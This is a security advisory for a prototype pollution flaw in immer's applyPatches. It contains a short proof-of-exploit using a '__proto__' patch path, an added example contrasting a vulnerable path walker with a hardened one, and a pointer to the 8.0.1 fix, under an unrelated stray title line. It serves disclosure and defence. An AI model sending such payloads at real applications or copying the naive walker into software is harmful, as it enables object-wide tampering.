Newts Parading Majestically
    Severity: high

    Prototype Pollution

    immer

    Overview

    Affected versions of immer are vulnerable to Prototype Pollution: applyPatches applies a patch whose path begins with "__proto__" onto Object.prototype, so the injected property appears on every object in the process.

    Proof of exploit

    const {applyPatches, enablePatches} = require("immer");
    enablePatches();
    let obj = {};
    console.log("Before : " + obj.polluted); // prints "undefined"
    // A patch path starting with "__proto__" is applied to Object.prototype
    applyPatches({}, [ { op: 'add', path: [ "__proto__", "polluted" ], value: "yes" } ]);
    // The 'replace' op reaches the same code path:
    // applyPatches({}, [ { op: 'replace', path: [ "__proto__", "polluted" ], value: "yes" } ]);
    console.log("After : " + obj.polluted); // prints "yes" on affected versions

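    As an added illustration (not immer's code, and not its actual 8.0.1 fix), the block below models the flawed path walk next to the hardened form with the check a fixed applier must perform before descending into an object; FORBIDDEN_KEYS, applyPatchNaive, applyPatchSafe and runAgainst are names constructed for this example.

```javascript
// Added example, not immer's code. A minimal JSON-Patch-style applier in the
// shape of the PoC above, first as a naive walker that models the flaw, then
// hardened with the path check a fixed version must perform.
const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);

// True when no segment of the patch path could steer the walk onto a prototype.
function isSafePatchPath(path) {
  return Array.isArray(path) && path.every((seg) => !FORBIDDEN_KEYS.has(String(seg)));
}

// Hypothetical naive applier: plain property access follows "__proto__" up to
// Object.prototype, so the final assignment lands on every object in the realm.
function applyPatchNaive(base, patch) {
  let node = base;
  for (const seg of patch.path.slice(0, -1)) {
    if (node[seg] === undefined) node[seg] = {};
    node = node[seg];
  }
  node[patch.path[patch.path.length - 1]] = patch.value; // add and replace alike
  return base;
}

// Hardened applier: reject prototype-reaching paths up front and only descend
// into own properties of the object being patched.
function applyPatchSafe(base, patch) {
  if (!isSafePatchPath(patch.path)) {
    throw new Error("refusing patch path " + JSON.stringify(patch.path));
  }
  let node = base;
  for (const seg of patch.path.slice(0, -1)) {
    if (!Object.prototype.hasOwnProperty.call(node, seg)) node[seg] = {};
    node = node[seg];
  }
  node[patch.path[patch.path.length - 1]] = patch.value;
  return base;
}

// Runs a patch of the advisory's shape (constructed here) through an applier and
// reports whether an unrelated object was polluted; the pollution is then undone.
function runAgainst(applier) {
  const probe = {};
  const patch = { op: "add", path: ["__proto__", "polluted"], value: "yes" };
  let rejected = false;
  try {
    applier({}, patch);
  } catch (e) {
    rejected = true;
  }
  const polluted = probe.polluted === "yes";
  delete Object.prototype.polluted; // leave the process clean again
  return { rejected, polluted };
}
```

    Running runAgainst(applyPatchNaive) reports the probe object as polluted, while runAgainst(applyPatchSafe) reports the patch rejected and the probe untouched.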
    Remediation

    Version 8.0.1 contains a fix for this vulnerability; upgrade to version 8.0.1 or later.


    Advisory timeline

    1. Advisory Published: Feb 19th, 2021
    2. Reported by Anonymous: Feb 19th, 2021